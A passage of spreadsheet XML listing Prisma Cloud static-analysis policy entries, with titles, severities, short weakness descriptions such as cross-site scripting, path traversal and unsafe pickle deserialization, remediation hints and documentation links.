      <c r="H3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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J359" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K359" t="inlineStr">
        <is>
          <t>Improperly secured inputs displayed on page</t>
        </is>
      </c>
      <c r="L359" t="inlineStr"/>
      <c r="M359" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N359" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O359" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P359" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q359" t="inlineStr"/>
      <c r="R359" t="inlineStr"/>
      <c r="S359" t="inlineStr"/>
      <c r="T359" t="b">
        <v>0</v>
      </c>
      <c r="U359" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V359" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W359" t="inlineStr">
        <is>
          <t>The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \"&lt;\", \"&gt;\", and \"&amp;\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.</t>
        </is>
      </c>
      <c r="X359" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-176</t>
        </is>
      </c>
      <c r="Y359" t="inlineStr"/>
      <c r="Z359" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA359" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB359" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC359" t="inlineStr">
        <is>
          <t>CKV3_SAST_176</t>
        </is>
      </c>
      <c r="AD359" t="b">
        <v>1</v>
      </c>
      <c r="AE359" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF359" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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9" t="inlineStr">
        <is>
          <t>10578a02-321f-45ea-9101-e5c7a5b49634</t>
        </is>
      </c>
      <c r="AI359" t="inlineStr"/>
      <c r="AJ359" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK359" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" t="inlineStr"/>
      <c r="B360" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C360" s="2" t="inlineStr"/>
      <c r="D360" t="inlineStr"/>
      <c r="E360" t="inlineStr"/>
      <c r="F360" t="inlineStr"/>
      <c r="G360" t="b">
        <v>1</v>
      </c>
      <c r="H3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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J360" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K360" t="inlineStr">
        <is>
          <t>Publicly exposed servers</t>
        </is>
      </c>
      <c r="L360" t="inlineStr"/>
      <c r="M360" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N360" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O360" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P360" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q360" t="inlineStr"/>
      <c r="R360" t="inlineStr"/>
      <c r="S360" t="inlineStr"/>
      <c r="T360" t="b">
        <v>0</v>
      </c>
      <c r="U360" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V360" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W360" t="inlineStr">
        <is>
          <t>Running `socket.bind` to 0.0.0.0, ::, or empty string could unexpectedly expose the server publicly as it binds to all available interfaces. Consider instead getting correct address from an environment variable or configuration file.</t>
        </is>
      </c>
      <c r="X360" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-5</t>
        </is>
      </c>
      <c r="Y360" t="inlineStr"/>
      <c r="Z360" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA360" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB360" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC360" t="inlineStr">
        <is>
          <t>CKV3_SAST_5</t>
        </is>
      </c>
      <c r="AD360" t="b">
        <v>1</v>
      </c>
      <c r="AE360" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF360" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>1a7fabad-4fde-4343-a32e-9ebc423fea40</t>
        </is>
      </c>
      <c r="AI360" t="inlineStr"/>
      <c r="AJ360" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK360" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" t="inlineStr"/>
      <c r="B361" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C361" s="2" t="inlineStr"/>
      <c r="D361" t="inlineStr"/>
      <c r="E361" t="inlineStr"/>
      <c r="F361" t="inlineStr"/>
      <c r="G361" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J361" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K361" t="inlineStr">
        <is>
          <t>Cookie contains sensitive session info</t>
        </is>
      </c>
      <c r="L361" t="inlineStr"/>
      <c r="M361" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N361" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O361" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P361" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q361" t="inlineStr"/>
      <c r="R361" t="inlineStr"/>
      <c r="S361" t="inlineStr"/>
      <c r="T361" t="b">
        <v>0</v>
      </c>
      <c r="U361" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V361" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W361" t="inlineStr">
        <is>
          <t>The information stored in a custom cookie should not be sensitive or related to the session. In most cases, sensitive data should only be stored in session and referenced by the users session cookie.</t>
        </is>
      </c>
      <c r="X361" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-21</t>
        </is>
      </c>
      <c r="Y361" t="inlineStr"/>
      <c r="Z361" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA361" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB361" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC361" t="inlineStr">
        <is>
          <t>CKV3_SAST_21</t>
        </is>
      </c>
      <c r="AD361" t="b">
        <v>1</v>
      </c>
      <c r="AE361" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF361" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>4678eb53-5a6f-4d63-b2ee-356285a2c0ee</t>
        </is>
      </c>
      <c r="AI361" t="inlineStr"/>
      <c r="AJ361" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK361" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" t="inlineStr"/>
      <c r="B362" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C362" s="2" t="inlineStr"/>
      <c r="D362" t="inlineStr"/>
      <c r="E362" t="inlineStr"/>
      <c r="F362" t="inlineStr"/>
      <c r="G362" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J362" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K362" t="inlineStr">
        <is>
          <t>Authorization is not robust</t>
        </is>
      </c>
      <c r="L362" t="inlineStr"/>
      <c r="M362" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N362" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O362" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P362" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q362" t="inlineStr"/>
      <c r="R362" t="inlineStr"/>
      <c r="S362" t="inlineStr"/>
      <c r="T362" t="b">
        <v>0</v>
      </c>
      <c r="U362" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V362" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W362" t="inlineStr">
        <is>
          <t>Authorizations granted or not to users to access resources of an application should be based on strong decisions. For instance, checking whether the user is authenticated or not, has the right roles/privileges. It may also depend on the user's location, or the date, time when the user requests access.</t>
        </is>
      </c>
      <c r="X362" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-26</t>
        </is>
      </c>
      <c r="Y362" t="inlineStr"/>
      <c r="Z362" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA362" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB362" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC362" t="inlineStr">
        <is>
          <t>CKV3_SAST_26</t>
        </is>
      </c>
      <c r="AD362" t="b">
        <v>1</v>
      </c>
      <c r="AE362" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF362" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>1ec64c3e-3572-4964-8fb1-3006d1972189</t>
        </is>
      </c>
      <c r="AI362" t="inlineStr"/>
      <c r="AJ362" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK362" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" t="inlineStr"/>
      <c r="B363" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C363" s="2" t="inlineStr"/>
      <c r="D363" t="inlineStr"/>
      <c r="E363" t="inlineStr"/>
      <c r="F363" t="inlineStr"/>
      <c r="G363" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J363" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K363" t="inlineStr">
        <is>
          <t>Improper neutralization of argument delimiters in a command ('Argument Injection')</t>
        </is>
      </c>
      <c r="L363" t="inlineStr"/>
      <c r="M363" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N363" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O363" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P363" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q363" t="inlineStr"/>
      <c r="R363" t="inlineStr"/>
      <c r="S363" t="inlineStr"/>
      <c r="T363" t="b">
        <v>0</v>
      </c>
      <c r="U363" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V363" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W363" t="inlineStr">
        <is>
          <t>The product constructs a string for a command to be executed by a separate component in another control sphere, but it does not properly delimit the intended arguments, options, or switches within that command string.</t>
        </is>
      </c>
      <c r="X363" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-7</t>
        </is>
      </c>
      <c r="Y363" t="inlineStr"/>
      <c r="Z363" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA363" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB363" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC363" t="inlineStr">
        <is>
          <t>CKV3_SAST_7</t>
        </is>
      </c>
      <c r="AD363" t="b">
        <v>1</v>
      </c>
      <c r="AE363" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF363" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>e0c3a4f2-8fac-4a32-b768-90094d7df849</t>
        </is>
      </c>
      <c r="AI363" t="inlineStr"/>
      <c r="AJ363" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK363" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" t="inlineStr"/>
      <c r="B364" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C364" s="2" t="inlineStr"/>
      <c r="D364" t="inlineStr"/>
      <c r="E364" t="inlineStr"/>
      <c r="F364" t="inlineStr"/>
      <c r="G364" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J364" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K364" t="inlineStr">
        <is>
          <t>Cryptographic keys should be robust</t>
        </is>
      </c>
      <c r="L364" t="inlineStr"/>
      <c r="M364" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N364" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O364" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P364" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q364" t="inlineStr"/>
      <c r="R364" t="inlineStr"/>
      <c r="S364" t="inlineStr"/>
      <c r="T364" t="b">
        <v>0</v>
      </c>
      <c r="U364" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V364" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W364" t="inlineStr">
        <is>
          <t>This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.</t>
        </is>
      </c>
      <c r="X364" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-197</t>
        </is>
      </c>
      <c r="Y364" t="inlineStr"/>
      <c r="Z364" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA364" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB364" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC364" t="inlineStr">
        <is>
          <t>CKV3_SAST_197</t>
        </is>
      </c>
      <c r="AD364" t="b">
        <v>1</v>
      </c>
      <c r="AE364" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF364" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>81cc0536-af53-4e7c-bee0-40a618a1cc3d</t>
        </is>
      </c>
      <c r="AI364" t="inlineStr"/>
      <c r="AJ364" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK364" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" t="inlineStr"/>
      <c r="B365" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C365" s="2" t="inlineStr"/>
      <c r="D365" t="inlineStr"/>
      <c r="E365" t="inlineStr"/>
      <c r="F365" t="inlineStr"/>
      <c r="G365" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J365" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K365" t="inlineStr">
        <is>
          <t>Improper restriction of operations within the bounds of a memory buffer</t>
        </is>
      </c>
      <c r="L365" t="inlineStr"/>
      <c r="M365" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N365" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O365" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P365" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q365" t="inlineStr"/>
      <c r="R365" t="inlineStr"/>
      <c r="S365" t="inlineStr"/>
      <c r="T365" t="b">
        <v>0</v>
      </c>
      <c r="U365" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V365" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W365" t="inlineStr">
        <is>
          <t>The app uses noAssert in Buffer API calls, deprecated since Node 10. This can lead to buffer overflows and crashes. Remove true in these calls, handle RangeError exceptions.</t>
        </is>
      </c>
      <c r="X365" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-158</t>
        </is>
      </c>
      <c r="Y365" t="inlineStr"/>
      <c r="Z365" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA365" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB365" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC365" t="inlineStr">
        <is>
          <t>CKV3_SAST_158</t>
        </is>
      </c>
      <c r="AD365" t="b">
        <v>1</v>
      </c>
      <c r="AE365" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF365" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>050e7ac1-6b18-40a4-8dc8-efcc8b706cd9</t>
        </is>
      </c>
      <c r="AI365" t="inlineStr"/>
      <c r="AJ365" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK365" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" t="inlineStr"/>
      <c r="B366" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C366" s="2" t="inlineStr"/>
      <c r="D366" t="inlineStr"/>
      <c r="E366" t="inlineStr"/>
      <c r="F366" t="inlineStr"/>
      <c r="G366" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J366" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K366" t="inlineStr">
        <is>
          <t>Unsanitized path input from an HTTP parameter is being opened</t>
        </is>
      </c>
      <c r="L366" t="inlineStr"/>
      <c r="M366" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N366" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O366" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P366" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q366" t="inlineStr"/>
      <c r="R366" t="inlineStr"/>
      <c r="S366" t="inlineStr"/>
      <c r="T366" t="b">
        <v>0</v>
      </c>
      <c r="U366" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V366" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W366" t="inlineStr">
        <is>
          <t>This can lead to a path traversal attack, where an attacker could potentially access, read, or even overwrite sensitive files on the server. Validate the input before using it, to make sure it adheres to what you expect.</t>
        </is>
      </c>
      <c r="X366" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-154</t>
        </is>
      </c>
      <c r="Y366" t="inlineStr"/>
      <c r="Z366" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA366" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB366" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC366" t="inlineStr">
        <is>
          <t>CKV3_SAST_154</t>
        </is>
      </c>
      <c r="AD366" t="b">
        <v>1</v>
      </c>
      <c r="AE366" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF366" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>933397f1-4b00-4912-aae9-78f9735a2622</t>
        </is>
      </c>
      <c r="AI366" t="inlineStr"/>
      <c r="AJ366" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK366" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" t="inlineStr"/>
      <c r="B367" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C367" s="2" t="inlineStr"/>
      <c r="D367" t="inlineStr"/>
      <c r="E367" t="inlineStr"/>
      <c r="F367" t="inlineStr"/>
      <c r="G367" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J367" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K367" t="inlineStr">
        <is>
          <t>Untrusted data is unsafely deserialized</t>
        </is>
      </c>
      <c r="L367" t="inlineStr"/>
      <c r="M367" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N367" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O367" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P367" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q367" t="inlineStr"/>
      <c r="R367" t="inlineStr"/>
      <c r="S367" t="inlineStr"/>
      <c r="T367" t="b">
        <v>0</v>
      </c>
      <c r="U367" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V367" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W367" t="inlineStr">
        <is>
          <t>Detected unsafe deserialization of unvalidated data. Avoid using `pickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data as JSON or a similar text-based serialization format.</t>
        </is>
      </c>
      <c r="X367" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-58</t>
        </is>
      </c>
      <c r="Y367" t="inlineStr"/>
      <c r="Z367" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA367" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB367" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC367" t="inlineStr">
        <is>
          <t>CKV3_SAST_58</t>
        </is>
      </c>
      <c r="AD367" t="b">
        <v>1</v>
      </c>
      <c r="AE367" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF367" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>dab5e6c3-1b73-4b2c-b5ca-042e8995804d</t>
        </is>
      </c>
      <c r="AI367" t="inlineStr"/>
      <c r="AJ367" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK367" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" t="inlineStr"/>
      <c r="B368" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C368" s="2" t="inlineStr"/>
      <c r="D368" t="inlineStr"/>
      <c r="E368" t="inlineStr"/>
      <c r="F368" t="inlineStr"/>
      <c r="G368" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J368" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K368" t="inlineStr">
        <is>
          <t>Writing unvalidated input into JSON</t>
        </is>
      </c>
      <c r="L368" t="inlineStr"/>
      <c r="M368" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N368" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O368" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P368" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q368" t="inlineStr"/>
      <c r="R368" t="inlineStr"/>
      <c r="S368" t="inlineStr"/>
      <c r="T368" t="b">
        <v>0</v>
      </c>
      <c r="U368" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V368" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W368" t="inlineStr">
        <is>
          <t>Unvalidated input in JSON enables attackers to inject malicious elements, leading to security breaches, data corruption, and unauthorized access.</t>
        </is>
      </c>
      <c r="X368" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-82</t>
        </is>
      </c>
      <c r="Y368" t="inlineStr"/>
      <c r="Z368" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA368" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB368" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC368" t="inlineStr">
        <is>
          <t>CKV3_SAST_82</t>
        </is>
      </c>
      <c r="AD368" t="b">
        <v>1</v>
      </c>
      <c r="AE368" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF368" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>e7c0ba71-2715-4dc8-a8f4-8e9753b56632</t>
        </is>
      </c>
      <c r="AI368" t="inlineStr"/>
      <c r="AJ368" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK368" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" t="inlineStr"/>
      <c r="B369" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C369" s="2" t="inlineStr"/>
      <c r="D369" t="inlineStr"/>
      <c r="E369" t="inlineStr"/>
      <c r="F369" t="inlineStr"/>
      <c r="G369" t="b">
        <v>1</v>
      </c>
      <c r="H3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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J369" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K369" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties</t>
        </is>
      </c>
      <c r="L369" t="inlineStr"/>
      <c r="M369" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N369" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O369" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P369" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q369" t="inlineStr"/>
      <c r="R369" t="inlineStr"/>
      <c r="S369" t="inlineStr"/>
      <c r="T369" t="b">
        <v>0</v>
      </c>
      <c r="U369" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V369" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W369" t="inlineStr">
        <is>
